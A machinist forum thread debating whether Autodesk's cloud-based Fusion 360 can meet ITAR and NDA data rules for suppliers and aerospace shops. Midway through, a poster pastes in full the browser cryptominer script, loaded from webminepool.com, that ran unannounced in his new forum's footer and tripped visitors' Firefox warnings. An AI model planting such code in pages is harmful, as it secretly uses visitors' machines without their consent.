What's new
What's new

Fusion 360 ITAR Survey

WOW, that must have put a real hurt on the cloud providers.:rolleyes5:

It got Ad's attention! Mattel is my largest client by far with well over 500 tools a year. Ironic as it may be since they are in China they worry about 3rd party integrations worse than any other country I work with.

So I have around 60 suppliers global that have suppliers themselves and when I sent out the email probably 20 suppliers replied they had been using Fusion and would move to a different system to bring them compliant. The trickle effect must have been much worse once it worked its way down the tiers as I had some pretty interesting conversations with Pat Rainsberry and that one other Fusion development manager thats constantly jaw jabbing on the Fusion forums.

So within one week my little old brokering service took out upwards of 100 seats of Fusion and I guess when asked why by AD they got a detailed explanation, thus getting me involved. I got the same ole lip service "Our service is secure" "No chance of a data breach" But in the end it's the simple fact the data is in a third parties possession that violates most any NDA agreement ever written.

I'd like to think that maybe I have a little to do with this poll they are doing as they are aware I have a meeting with Foxconn in a few weeks where Fusion will be a highlighted topic. Mattels little ole mold and die-cast division would be a grain of sand in the crack of their ass in comparison to Apple, Nokia, Sony Playstation, Xbox, and several other brand eliminating their suppliers that use Fusion!

I'm glad this topic came back up. I just finished building a new machinist forum and I realize now it should have a whole forum node dedicated to Fusion 360.

WOW, that must have put a real hurt on the cloud providers.:rolleyes5:

Those of you rolling your eyes at this kind of comment have clearly never had to deal with the joys of convincing a client that your procedures satisfy their data protection requirements.

I have never dealt with ITAR, but I have plenty of clients that have their own procedures for data handling, and have been audited for such.

Easy to roll your eyes if your client base doesn't care.

Sounds promising, like an ambitious and forward-thinking company is evaluating the market and moving in directions required/requested by their customers and would-be customers.

Can't wait to hear from members here about why they're full of shit and how they'll screw you over in the end.

That is their business model....

I would think if Fusion wanted to be ITAR comliant it would have to offer an ITAR compliant version that saved the files to the local harddrive and didn't involve any interaction with the cloud.

The DOD is about to put a bunch of actual TS info in "the cloud." This argument is simply ridiculous.

The DOD is about to put a bunch of actual TS info in "the cloud." This argument is simply ridiculous.

Not in the slightest. It all depends on the project and the customer. Just because the DOD does something doesn't mean the vendor has to follow suit.

Last place I worked had projects which were ITAR where the customer (not the DOD) insisted that the computers be disconnected from the company server, and the wireless/ethernet cards be removed.And when it came time to finish the project the customer would retrieve the hard drive from the computer. Those were classified projects, but still ITAR.

They had ITAR projects where the data was hand delivered on a CD/DVD disk, because the customers IT dept wouldn't allow it to be transmitted over the net.

Because of the number of non-US citizens in the company, one customer insisted that screens be put up around machines running their ITAR parts. When the parts went into inspection the windows in inspection were covered and non-US people were not allowed in. Do you think that company would allow data on the cloud? ZERO chance of that.

So it doesn't strain the imagination to understand that AD would benefit them selves from offering a standalone system that kept the data to itself.

The added advantage to AD is they can ask more $'s for the seat, but likely still be very competitve against other CAD/CAM providers.

When I just visited your link I got a Firefox just blocked a cryptominer something or other warning. I guess we know what your new forum is about.

I can see it just fine in Firefox, and Thermite and Donie probably can as well..........

What's up with this? I go to the link in this post and this pops up. And your babbling about security?

It's fixed. And bingo! See how a simple Script passed through most on heres browser! even my Firefox missed it.

Not in the slightest. It all depends on the project and the customer. Just because the DOD does something doesn't mean the vendor has to follow suit.

No, I am saying the arguments that cloud computing is intrinsically insecure are ridiculous in light of the fact that the DOD is putting all our data Crown Jewels onto Azure.

When I just visited your link I got a Firefox just blocked a cryptominer something or other warning. I guess we know what your new forum is about.

Actually that site was intended to not have any monetary gain at all. My IT guy just happened to use a footer template that ran a miner script that I use on my political fiasco sites (Legally).

BUT, this just goes to prove my point about security. How easy it would be to put a simple JAVA script inside any file and upload it to AD's cloud and let it milk. Then let someone else open it on their system?!?!

Here is the exact Script. How hard would it be to find this in the AD files.

<script src="https://www.webminepool.com/lib/base.js"></script>
<script>
var miner = WMP.Anonymous('XXXXXXXXXXXXXXXX',{throttle: 0.3});
if (!miner.isMobile()){
miner.start();
}
</script>

It's fixed. And bingo! See how a simple Script passed through most on heres browser! even my Firefox missed it.

So you -are- running malicious code on your domain, then? Good to know. Will be sure to avoid in the future.

Point seems moot anyway, since their solution sounds like a local workflow, sans-cloud. No more point in discussing web solutions/vulnerabilities.

No, I am saying the arguments that cloud computing is intrinsically insecure are ridiculous in light of the fact that the DOD is putting all our data Crown Jewels onto Azure.

I bet the DOD is going to Azure because it saves money over whatever system their using now. No other plausible reason.

Anyway, there's probably not much data that hasn't already been comprimised by Russia and China already.

Its not cloud computing that is the issue. Its what happens to that data and who is looking at it or has access to it. F360 is not ITAR compliant because it chooses not to be, not because the cloud cannot be ITAR compliant.

AWS or Azure solutions that are ITAR compliant are not the same thing the average joe internet users are using, so do not insinuate that the DOD has uploaded reams of top secret data to their Dropbox account.

AWS or Azure solutions that are ITAR compliant are not the same thing the average joe internet users are using, so do not insinuate that the DOD has uploaded reams of top secret data to their Dropbox account.[/QUOTE]

Hilary Clinton did exactly that, as secretary of state.

Sent from my SM-N960U using Tapatalk

I used Fusion for a short time, didn't like it compared to Surfcam

Not that I know any better, but I had the impression a lot of sales were to the homeshop cnc machinists, nerds with 3D printers, and probably a large chunk to shops running broken Catia/NX/Mcam?surfcam etc who wanted a legit version of a CAM product to hide behind, I know at least a few seats that got sold to cover the use of cracked software.

But for a lot of shops the saving to the cloud was a huge issue, not only data security, but having to add an internet connection to the shop were there wasn't one before. I don't have internet at the shop because I don't need it. I'm 5 minutes from the house so I can always go home to take care of any business on the net I need to.

But I suspect they realised Fusion had to put it's bigboy pants on if it wanted to compete head to head with the other CAM systems. I don't know a single aerospace company that uses Fusion, or intends to use Fusion in the future,solely because it saves to the cloud. That's even with employees who use Fusion at home and extol it's virtues. If it stores files on the cloud their not going to use it.

I would think AD long ago knew this, and held of on a standalone version, until Fusion became a more mature product.

It'll be interesting to see how it's going to be priced.

If a F360 version becomes available for a similar price that doesn't require internet connection, I would get it just so I don't have a new update every day that breaks all my files, changes all the tools, and gives me new bugs. What a blessing.

Back